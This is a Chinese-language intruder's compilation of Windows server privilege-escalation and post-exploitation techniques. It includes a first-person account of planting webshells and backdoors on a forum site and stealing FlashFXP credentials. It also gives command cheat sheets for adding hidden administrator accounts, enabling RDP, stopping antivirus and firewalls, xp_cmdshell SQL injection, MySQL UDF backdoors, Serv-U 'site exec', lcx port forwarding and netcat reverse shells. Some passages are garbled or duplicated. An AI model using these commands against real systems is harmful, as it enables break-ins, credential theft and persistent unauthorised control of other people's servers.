其一，如果服务器上有装了 pcanywhere 服务端，管理员为了便于管理也给了我们方便，到系统盘的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用 pcanywhere连接就 ok了。

其二，如果对方有 Serv-U大家不要骂我啊，通过修改 ServUDaemon.ini 和 fpipe这软件提升权限应该是不成问 题吧。


其三，通过替换系统服务来提升。


其四，查找 conn和 config这类型的文件看能否得到 sa 或者 mysql 的相关密码，可能会有所收获等等。本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自己的运气了

本人 www.xxx.com 通过 bbs 得到了一个 webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了N 个文件中，够黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs 升级到动网 sp2 了我放的小马也被 K 了，人家的 BBS 是 access 版本的。郁闷啊！突然想起我将一个页面插入了 asp 的后门，看看还有没有希望了。输www.xxx.com/xx.aspid =1 好家伙，还在！高兴 ing于是上传了一个 asp的脚本的后门，怎么提升权限呢在这个网站的主机上游荡了N 分钟， 在 C:\\ Program Files 下发现了 FlashFXP 文件夹(跟我一样使用这个软件自己心里暗想)图 2， 于是就打了了 Sites. dat 这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。

如果我把这些文件 copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢于是我就将 Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中 flashfxp 文件夹的相应文件。打开 flashfxp 在站点中打开站点管理器一项。乖 乖发财了对方管理员通过 flashfxp连接的各个站点都在图 3，点击连接。通过了于是我们又有了一堆肉鸡，我们有 ftp权限。上传脚本 木马~ 呵呵。说了半天这提升权限的事情一点没讲啊 不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！又想起了在 Sites.dat 中也显示了密码和用户名，而且密码是加密的。现在的星号密码会不会也是加了密的看看就行了呗。怎么看 菜鸟了吧 手头有个不错的查看星号的软件，就是 xp 星号密码查看器，通过查看跟Sites.dat 中加密了密码做比较。看图 4 和图 5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧

下一步就是使用 xp 星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩 sniff的时光。呵呵


密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+


用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69


(上述部分密码和用户名已经作了必要的修改)


这么多的信息，按社会工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。


我想这个问题应该反馈到 flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。


经过后来测试只要把含有密码和用户名的 Sites.dat 文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。 希望大家在入侵的时候遇到 fla shfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试希望能给大家渗透带来帮助。

——————————————————————————–


第五，将 asp权限提到最高


by: cnqing from:http://friend.91eb.com


本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家


好了。简单说说，说的太麻烦没有必要。懂了就行。


原理：


asp文件的教本解释是由asp.dll 运行的。由 dllhost.exe启动的。身分是 IWAN_NAME。若是把 asp.dll 放到 inprocesslsapiapps 中那它就是由 inetifo.exe直接启动。身份是 system

方法：


第一步。


得到 inprocesslsapiapps 内容，用命令”cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs getw3svc/inprocessisapiapps”。将得到的一组 dll 复制下来。

第二步


写一个 bat 内容为”cscript C:\\Inetpub\\AdminScripts\\ adsutil vbs set w3svc/inprpocessisapiapps

“C:\\Inetpub\\AdminScripts\\asp.dll” ·····


省略号为复制下的内容。中间用空格分开不要带回车符最后运行这个 bat 就行了。


例如：


我用”cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps”得到

“c:\\winnt\\system32\\inetsrv\\httpext.dll”


“c:\\winnt\\system32\\inetsrv\\httpodbc.dll”


“C:\\WINNT\\system32\\inetsrv\\ssinc.dll”


“C:\\WINNT\\System32\\msw3prt.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server


Extensions\\isapi\\_vti_aut\\author.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server


Extensions\\isapi\\_vti_adm\\admin.dll”


“C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll”

那么你的 bat 就应该是：


cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps


“C:\\Inetpub\\AdminScripts\\asp.dll” ”c:\\winnt\\system32\\inetsrv\\httpext.dll”

“c:\\winnt\\system32\\inetsrv\\httpodbc.dll” ”C:\\WINNT\\system32\\inetsrv\\ssinc.dll”

“C:\\WINNT\\System32\\msw3prt.dll” ”C:\\Program Files\\Common Files\\Microsoft


Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll” ”C:\\Program Files\\Common

Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll” ”C:\\Program

Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll”


已测试成功！！


——————————————————————————–


第六，利用%5c绕过验证


—————————————


lake2（http://mrhupo.126.com）


—————————————


说到%5c，你是不是想起了当前流行的那个%5c暴库漏洞，呵呵，本文就是对%5c利用的探索（呵呵，当然有我提出的新东东，或许对你有帮助哦^_^）。


好，我们先追根溯源，找到那个漏洞的老底。看看绿盟 2001 年的漏洞公告：


[url=http://www.nsfocus.net/index.phpac



部分提权指令：

ipconfig 显示本地IP地址


net start telnet 开telnet服务


net use z:127.0.0.1c$　　　　　映射对方的C盘


net user　　　　　　　　　　　　查看所有用户列表


net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz


net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员


开3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


whoami 查看当前用户


NET START（<span style=]http://www.nsfocus.net/index.phpac



部分提权指令：

ipconfig 显示本地IP地址


net start telnet 开telnet服务


net use z:127.0.0.1c$　　　　　映射对方的C盘


net user　　　　　　　　　　　　查看所有用户列表


net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz


net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员


开3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


whoami 查看当前用户


NET START（ 80<1.txt


-vv: 回显


80: www端口


1.txt: 就是你要发送的数据包


———————————–


LCX端口转发


先本地监听51端口 lcx.exe -listen 51 3389


c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发


c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389[/url]

某大牛的渗透笔记：

1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:windowstempcookiesnet1.exe user


2.当提权成功，3389没开的情况下，上传开3389的vps没成功时，试试上传rootkit.asp 用刚提权的用户登录进去就是system权限，再试试一般就可以了。


3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe/cmd.com/cmd.txt 都可以。


4.cmd命令：systeminfo，看看有没有KB952004、KB956572、KB970483这三个补丁，如果没有，第一个是pr提权，第二个是巴西烤肉提权，第三个是iis6.0提权。


6.c:windowstempcookies 这个目录


7.找sa密码或是root密码，直接利用大马的文件搜索功能直接搜索，超方便！


8.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:RECYCLERpr.exe，命令那里清空(包括/c )输入”net user jianmei daxia /add”


9.增加用户并提升为管理员权限之后，如果连接不上3389，上传rootkit.asp脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。


10.有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码(hash值)”，俩个都上传，执行PwDump7.exe就可以了，之后到网站去解密即可。


11.有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令 tasklist 查看进程


12.其实星外提权只要一个可执行的文件即可，先运行一遍cmd，之后把星外ee.exe命名为log.csv 就可以执行了。


13.用wt.asp扫出来的目录，其中红色的文件可以替换成exp，执行命令时cmd那里输入替换的文件路径，下面清空双引号加增加用户的命令。


14.提权很无奈的时候，可以试试TV远控，通杀内外网，穿透防火墙，很强大的。


15. 当可读可写目录存在空格的时候，会出现这样的情况：’Cocuments’ 不是内部或外部命令，也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互shell切换到exp路径，如：Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目录
然后再执行exp或者cmd，就不会存在上面的情况了，aspshell一般是无法跳转目录的～


16.有时候可以添加用户，但是添加不到管理组，有可能是administrators改名了，net user administrator 看下本地组成员，*administrators


17.进入服务器，可以继续内网渗透 这个时候可以尝试打开路由器 默认帐号密码 admin admin


18.有的cmd执行很变态，asp马里，cmd路径填上面，下面填：””c:xxxexp.exe “whoami” 记得前面加两个双引号，不行后面也两个，不行就把exp的路径放在cmd那里，下面不变。


19.一般增加不上用户，或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里，用“直接使服务器蓝屏重启的东东”这个工具可以实现，


20.执行PwDump7.exe抓哈希值的时候，建议重定向结果到保存为1.txt /c c:windowstempcookiesPwDump7.exe >1.txt


21.菜刀执行的技巧，上传cmd到可执行目录，右击cmd 虚拟终端，help 然后setp c:windowstempcmd.exe 设置终端路径为：c:windowstempcmd.exe


22.当不支持aspx，或是支持但跨不了目录的时候，可以上传一个读iis的vps，执行命令列出所有网站目录，找到主站的目录就可以跨过去了。
上传cscript.exe到可执行目录，接着上传iispwd.vbs到网站根目录，cmd命令/c “c:windowstempcookiescscript.exe” d:webiispwd.vbs


23.如何辨别服务器是不是内网？ 192.168.x.x 172.16.x.x 10.x.x.x


(( dos命令大全 ))


查看版本：ver


查看权限：whoami


查看配置：systeminfo


查看用户：net user


查看进程：tasklist


查看正在运行的服务：tasklist /svc


查看开放的所有端口：netstat -ano


查询管理用户名：query user


查看搭建环境：ftp 127.0.0.1


查看指定服务的路径：sc qc Mysql


添加一个用户：net user jianmei daxia.asd /add


提升到管理权限：net localgroup administrators jianmei /add


添加用户并提升权限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add


查看制定用户信息：net user jianmei


查看所有管理权限的用户：net localgroup administrators


加入远程桌面用户组：net localgroup “Remote Desktop Users” jianmei /add


突破最大连接数：mstsc /admin /v:127.0.0.1


删除用户：net user jianmei /del


删除管理员账户:net user administrator daxia.asd


更改系统登陆密码：net password daxia.asd


激活GUEST用户：net user guest /active:yes


开启TELNET服务：net start telnet


关闭麦咖啡：net stop “McAfee McShield”


关闭防火墙：net stop sharedaccess


查看当前目录的所有文件：dir c:windows


查看制定文件的内容：type c:windows1.asp


把cmd.exe复制到c:windows的temp目录下并命名为cmd.txt：copy c:windowstempcookiescmd.exe c:windowstempcmd.txt


开3389端口的命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


查 看补丁：dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt


(( SQL语句直接开启3389 ))


3389登陆关键注册表位置：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections


其中键值DenyTSConnections 直接控制着3389的开启和关闭，当该键值为0表示3389开启，1则表示关闭。


而MSSQL的xp_regwrite的存储过程可以对注册进行修改，我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。


开启3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–


关闭3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–


(( 常见杀软 ))


360tray.exe 360实时保护


ZhuDongFangYu.exe 360主动防御


KSafeTray.exe 金山卫士


McAfee McShield.exe 麦咖啡


SafeDogUpdateCenter.exe 服务器安全狗


(( windows提权中敏感目录和敏感注册表的利用 ))


敏感目录 目录权限 提权用途


Crogram Files 默认用户组users对该目录拥有查看权 可以查看服务器安装的应用软件
Cocuments and SettingsAll Users「开始」菜单程序 Everyone拥有查看权限 存放快捷方式，可以下载文件，属性查看安装路径
Cocuments and SettingsAll UsersDocuments Everyone完全控制权限 上传执行cmd及exp
C:windowssystem32inetsrv Everyone完全控制权限 上传执行cmd及exp
C:windowsmy.iniCrogram FilesMySQLMySQL Server 5.0my.ini 默认用户组users拥有查看权限 安装mysql时会将root密码写入该文件
C:windowssystem32 默认用户组users拥有查看权限 Shift后门一般是在该文件夹，可以下载后门破解密码
Cocuments and SettingsAll Users「开始」菜单程序启动 Everyone拥有查看权限 可以尝试向该目录写入vbs或bat，服务器重启后运行。
C:RECYCLERD:RECYCLER Everyone完全控制权限 回收站目录。常用于执行cmd及exp
Crogram FilesMicrosoft SQL Server 默认用户组users对该目录拥有查看权限 收集mssql相关信息，有时候该目录也存在可执行权限
Crogram FilesMySQL 默认用户组users对该目录拥有查看权限 找到MYSQL目录中user.MYD里的root密码
Craclexe 默认用户组users对该目录拥有查看权限 可以尝试利用Oracle的默认账户提权
C:WINDOWSsystem32config 默认用户组users对该目录拥有查看权限 尝试下载sam文件进行破解提权
Crogram FilesGeme6 FTP ServerRemote AdminRemote.ini 默认用户组users对该目录拥有查看权限 Remote.ini文件中存放着G6FTP的密码
crogram FilesRhinoSoft.comServ-Ucrogram FilesServ-U 默认用户组users对该目录拥有查看权限 ServUDaemon.ini 中存储了虚拟主机网站路径和密码
c:windowssystem32inetsrvMetaBase.xml 默认用户组users对该目录拥有查看权限 IIS配置文件
C:tomcat5.0confresin.conf 默认用户组users对该目录拥有查看权限 Tomat存放密码的位置
C:ZKEYSSetup.ini 默认用户组users对该目录拥有查看权限 ZKEYS虚拟主机存放密码的位置


(( 提权中的敏感注册表位置 ))


HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 远程终端 值为0 即为开启
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机注册表配置位置
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用户及密码（su加密）位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在该注册表位置PortNumber的值即位3389端口值
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的注册表位置，提权运用请谷歌
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件，提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注册表全版本泄漏用户路径和FTP用户名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 华众主机在注册表中保存的mssql、mysql等密码
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主机mssql的sa账号密码，双MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注册表位置，当然也包括ControlSet001、ControlSet003


(( wscript.shell的删除和恢复 ))


载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%system32WSHom.Ocx


卸载FSO对象，在cmd下或直接运行：regsvr32.exe /u %windir%system32scrrun.dll


卸载stream对象，在cmd下或直接运行：regsvr32 /s /u “CrogramFilesCommonFilesSystemadomsado15.dll”


如果想恢复的话只需要去掉/U 即可重新再注册以上相关ASP组件，这样子就可以用了


(( 如何找到准确的终端连接端口？))


在aspx大马里，点击“系统信息”第三个就是目前的3389端口


或是执行命令查看正在运行的服务：tasklist /svc


找到：svchost.exe 1688 TermService


记住1688这个ID值，


查看开放的所有端口：netstat -ano


找到1688这个ID值所对应的端口就是3389目前的端口


(( iis6提权提示Can not find wmiprvse.exe的突破方法 ))


突破方法一：


在IIS环境下，如果权限做得不严格，我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的，进程查看里面直接K掉


在结束之后，它会再次运行，这时候的PID值的不一样的。这时候我们回来去运行exp，直接秒杀。




突破方法二：


虚拟主机，一般权限严格限制的，是没权限结束的，这时候我们可以考虑配合其他溢出工具让服务器强制重启，比如“直接使服务器蓝屏重启的东东”


甚至可以暴力点，DDOS秒杀之，管理发现服务器不通了首先肯定是以为服务器死机，等他重启下服务器（哪怕是IIS重启下）同样秒杀之。


(( 本地溢出提权 ))


计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.


缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.


利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.


想要执行cmd命令，就要wscript.shell组建支持，或是支持aspx脚本也行，因为aspx脚本能调用.net组件来执行cmd的命令.


(( sa提权 ))


扫描开放的端口，1433开了就可以找sa密码提权，用大马里的搜索文件功能，sa密码一般在conn.asp config.asp web.config 这三个文件


也可以通过注册表找配置文件，看下支持aspx不，支持的话跨目录到别的站点上找，找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。


aspx马提权执行命令有点不一样，点击数据库管理–选MSSQL–server=localhost;UID=saWD=;database=masterrovider=SQLOLEDB–输入帐号密码连接即可


增加一个用户：exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–
提升为管理员：exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–


PS:如果增加不上，说明是xp_cmdshell组建没有，增加xp_cmdshell组建：Use master dbcc addextendedproc(‘xp_cmdshell’,’xplog70.dll’)


(( root提权 ))


利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码


如何判断一台windows服务器上的mysql有没有降权？
cmd命令net user 如果存在 mysql mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了


如何判断服务器上是否开启了mysql服务？
开了3306端口，有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.


如何查看root密码？
在mysql的安装目录下找到user.myd这个文件，root就藏在里面，一般是40位cmd加密，一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。
有时会显得很乱，这时就需要自己去组合，前17位在第一行可以找到，还有23位在第三行或是其他行，自己继续找。


可以直接用php脚本里“mysql执行”，或是上传个UDF.php，如果网站不支持PHP，可以去旁一个php的站，也可以把UDF.php上传到别的phpshell上也可以。


填入帐号密码之后，自然就是安装DLL了，点击“自动安装Mysql BackDoor” 显示导出跟创建函数成功后，紧接着执行增加用户的命令即可。


注意：5.0版本以下(包括5.0的)默认c:windows系统目录就可以了，5.1版本以上的不能导出到系统目录下创建自定义函数，只能导出在mysql安装目录下的lib/plugin目录中


例如：D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll


如果密码看不见，或是组合不到40位，就本地安装一个mysql吧，
1、停止mysql服务
2、替换下载下来的3个文件（user.MYI user.MYD user.frm）
3、cmd切换到bin目录下，进入mysql安全模式，cmd命令：mysqld-nt –skip-grant-tables
4、重新打开一个cmd 切换到bin目录下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot -proot
5、最后查询一下就出来了select user,password from mysql.user;


(( serv-u提权 ))


这个文件里包含serv-u的md5密码：Crogram FilesRhinoSoft.comServ-U\ServUDaemon.ini


找到这个文件：ServUDaemon.ini 打开找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2


再拿md5密文去解密，再用现在的密码登陆提权即可。


serv-u提权的前提是43958端口开了，且知道帐号密码！


如果帐号密码默认，直接用shell里面的serv-u提权功能即可搞定，建议用aspx马、php马去提权，因为可以看回显。


530说明密碼不是默认的,回显330说明成功，900说明密码是默认的……………..


在程序里找个快捷方式，或是相关的文件进行下载到本地，再查看文件的属性，就可以找到serv-u的安装目录了。


目录有修改权限之serv-u提权：


找到serv-u的目录，再找到用户的配置文件ServUDaemon.ini，直接增加一个用户代码，保存！


接着本地cmd命令：ftp 服务器ip


回车，输入帐号密码再回车………………….


接着先试试普通的cmd命令提权，不行的话就使用ftp提权的命令：


Quote site exec net user jianmei daxia /add 增加一个用户


Quote site exec net localgroup administrators jianmei /add 提升到管理员权限


200 EXEC command successful (TID=33). 执行成功的回显信息


Maintenance=System 权限类型多加一行指定新加帐号为系统管理员


ReloadSettings=True 在修改ini文件后需加入此项，这时serv-u会自动刷新配置文件并生效


(( 端口转发 ))


什么情况下适合转发端口？


1.服务器是内网，我们无法连接。
2.服务器上有防火墙，阻断我们的连接。


转发端口的前提，我们是外网或是有外网服务器。


找个可读可写目录上传lcx.exe


本地cmd命令：lcx.exe -listen 1988 4567 （监听本地1988端口并转发到4567端口）


接着shell命令：/c c:windowstempcookieslcx.exe -slave 本机ip 1988 服务器ip 3389 （把服务器3389端口转发到本地4567端口）


之后本地连接：127.0.0.1:4567 (如果不想加上:4567的话，本地执行命令的时候，把4567换成3389来执行就行了)


以上是本机外网情况下操作，接着说下在外网服务器里如何操作：


上传lxc.exe cmd.exe到服务器且同一目录，执行cmd.exe命令：lcx.exe -listen 1988 4567


接着在aspxshell里点击端口映射，远程ip改为站点的ip，远端口程填1988，点击映射端口，接着在服务器里连接127.0.0.1:4567就可以了。


(( nc反弹提权 ))


当可以执行net user，但是不能建立用户时，就可以用NC反弹提权试下，特别是内网服务器，最好用NC反弹提权。


不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口，那么这种方法也失效了….


找个可读可写目录上传nc.exe cmd.exe




-l 监听本地入栈信息


-p port打开本地端口


-t 以telnet形式应答入栈请求


-e 程序重定向


本地cmd执行：nc -vv -l -p 52 进行反弹


接着在shell里执行命令：c:windowstempnc.exe -vv 服务器ip 999 -e c:windowstempcmd.exe 最好是80或8080这样的端口，被防火墙拦截的几率小很多


执行成功后本地cmd命令：cd/ （只是习惯而已）


接着以telnet命令连接服务器：telnet 服务器ip 999


回车出现已选定服务器的ip就说明成功了，接着权限比较大了，尝试建立用户！


坏蛋：
本地cmd执行：nc -vv -l -p 52 进行反弹
c:windowstempnc.exe -e c:windowstempcmd.exe 服务器ip 52


低调小飞：
shell执行命令c:windowstempnc.exe -l -p 110 -t -e c:windowstempcmd.exe




一般这样的格式执行成功率很小，不如直接在cmd那里输入：c:windowstempnc.exe 命令这里输入：-vv 服务器ip 999 -e c:windowstempcmd.exe


这个技巧成功率比上面那个大多了，不单单是nc可以这样，pr这些提权exp也是可以的。


(( 星外提权 ))


如何知道是不是星外主机？


第一：网站物理路径存在“freehost”
第二：asp马里点击程序，存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹


默认帐号：freehostrunat
默认密码：fa41328538d7be36e83ae91a78a1b16f!7


freehostrunat这个用户是安装星外时自动建立的，已属于administrators管理组，而且密码不需要解密，直接登录服务器即可


星外常写目录：


C:RECYCLER
C:windowstemp
e:recycler
f:recycler
C:phpPEAR
C:WINDOWS7i24.comFreeHost
C:phpdev
C:System Volume Information
C:7i24.comserverdoctorlog
C:WINDOWSTemp
c:windowshchiblis.ibl
C:7i24.comiissafelog
C:7i24.comLinkGatelog
Crogram FilesThunder NetworkThunder7
C:Program FilesThunder NetworkThunder
C:Program FilesSymantec AntiVirusSAVRT
c:windowsDriverPacksCAM2
C:Program FilesFlashFXP
c:Program FilesMicrosoft SQL Server90SharedErrorDumps
C:Program FilesZendZendOptimizer-3.3.0
C:Program FilesCommon Files
cocuments and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv
c:Program Files360360SafedeepscanSectionmutex.db
c:Program FilesHeliconISAPI_Rewrite3error.log
c:Program FilesHeliconISAPI_Rewrite3Rewrite.log
c:Program FilesHeliconISAPI_Rewrite3httpd.conf
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedValidate.dat
C:Program FilesZendZendOptimizer-3.3.0docs
Cocuments and SettingsAll UsersDRM
Cocuments and SettingsAll UsersApplication DataMcAfeeDesktopProtection
Cocuments and SettingsAll UsersApplication Data360safesoftmgr
C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
Cocuments and SettingsAll UsersApplication DataMicrosoftMedia Index




ee提权法：


找个可读可写目录上传ee.exe


cmd命令：/c c:windowstempcookiesee.exe -i （获取星外帐号的id值，例如回显：FreeHost ID：724）


接着命令：/c c:windowstempcookiesee.exe -u 724 （获取星外的帐号密码）




vbs提权法：


找个可读可写目录上传cscript.exe iispwd.vbs


cmd命令：/c “c:windowstempcookiescscript.exe” c:windowstempcookiesiispwd.vbs


意思是读取iis，这样一来，不但可以获取星外的帐号密码，还可以看到同服务器上的所有站点的目录。




可行思路大全：


经测试以下目录中的文件权限均为everyone，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行：


360杀毒db文件替换:
c:Program Files360360SDdeepscanSectionmutex.db
c:Program Files360360SafedeepscanSectionmutex.db
C:Program Files360360SafeAntiSectionmutex.db


IISrewrite3 文件替换：
C:Program FilesHeliconISAPI_Rewrite3Rewrite.log
C:Program FilesHeliconISAPI_Rewrite3httpd.conf
C:Program FilesHeliconISAPI_Rewrite3error.log


诺顿杀毒文件替换:
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedPersist.Dat


一流过滤相关目录及文件：
C:7i24.comiissafelogstartandiischeck.txt
C:7i24.comiissafelogscanlog.htm


其他:
Zend文件替换：C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
华盾文件替换：C:WINDOWShchiblis.ibl
Flash文件替换：C:WINDOWSsystem32MacromedFlashFlash10q.ocx
DU Meter流量统计信息日志文件替换：c:Documents and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv


(( 360提权 ))


找个可读可写目录上传360.exe


cmd命令：/c c:windowstempcookies360.exe


会提示3段英文：


360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2


You will get a Shift5 door!


Shift5 Backdoor created!


这是成功的征兆，接着连接服务器连按5下shift键，将弹出任务管理器，点击新建任务：explorer.exe 会出现桌面，接下来大家都会弄了……


(( 搜狗提权 ))


搜狗的目录默认是可读可写的，搜狗每隔一段时间就会自动升级，而升级的文件是pinyinup.exe


我们只要把这个文件替换为自己的远控木马，或是添加账户的批处理，等搜狗升级的时候，就可以达成我们的目的了。


(( 华众虚拟主机提权 ))


就经验来说，一般溢出提权对虚拟主机是无果的，而且华众又没有星外那么明显的漏洞。


所以华众提权关键之处就是搜集信息，主要注册表位置：


HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpass root密码
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmssqlpss sa 密码


c:windowstemp 下有hzhost主机留下的ftp登陆记录有用户名和密码


以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具使用


百度搜索：hzhosts华众虚拟主机系统6.x 破解数据库密码工具




(( N点虚拟主机 ))


N点虚拟主机管理系统默认数据库地址为：host_date#host # date#.mdb


rl直接输入不行 这里咱们替换下 #=# 空格=


修改后的下载地址为/host_date/#host # date#196.mdb


N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码


N点默认安装路径C:Program FilesNpointSoftnpointhostweb
D:Program FilesNpointSoftnpointhostweb
默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库


提权成功后3389连接不上的几种解决办法（来自七行）：

有时候我们入侵提完权后，3389端口开了，可还是没办法连3389，这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。 提供一些思路和方法。


方法一：网站服务器在内网。


1，用lcx转发在后连接


2，上神器reDuh ，貌似现在有GUI版的，更方便了。


方法二：做了tcp/ip筛选。


1，把端口转为TCP/IP里设置的只允许连接的端口其中一个。


2，用EvilCat取消端口限制


3，用regedit -e导出HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet003ServicesTcpipParameters
以上三个键值,本地修改把EnableSecurityFilters值改成dword:00000000在导入覆盖。


方法三：服务器做了ip安全策略或windows自带防火墙。


1，执行cmd命令： cmd /c net stop policyagent 停掉IPSEC Services。


2，执行cmd /c net stop sharedaccess停掉windows自带的防火墙，然后再连3389。


方法四：管理员设置的终端登陆权限只有指定的用户可以登入。


1、在cmd下把你登陆的用户名加入远程桌面用户组，即remote desktop users


2，命令关掉设置权限的服务


方法五：防火墙。


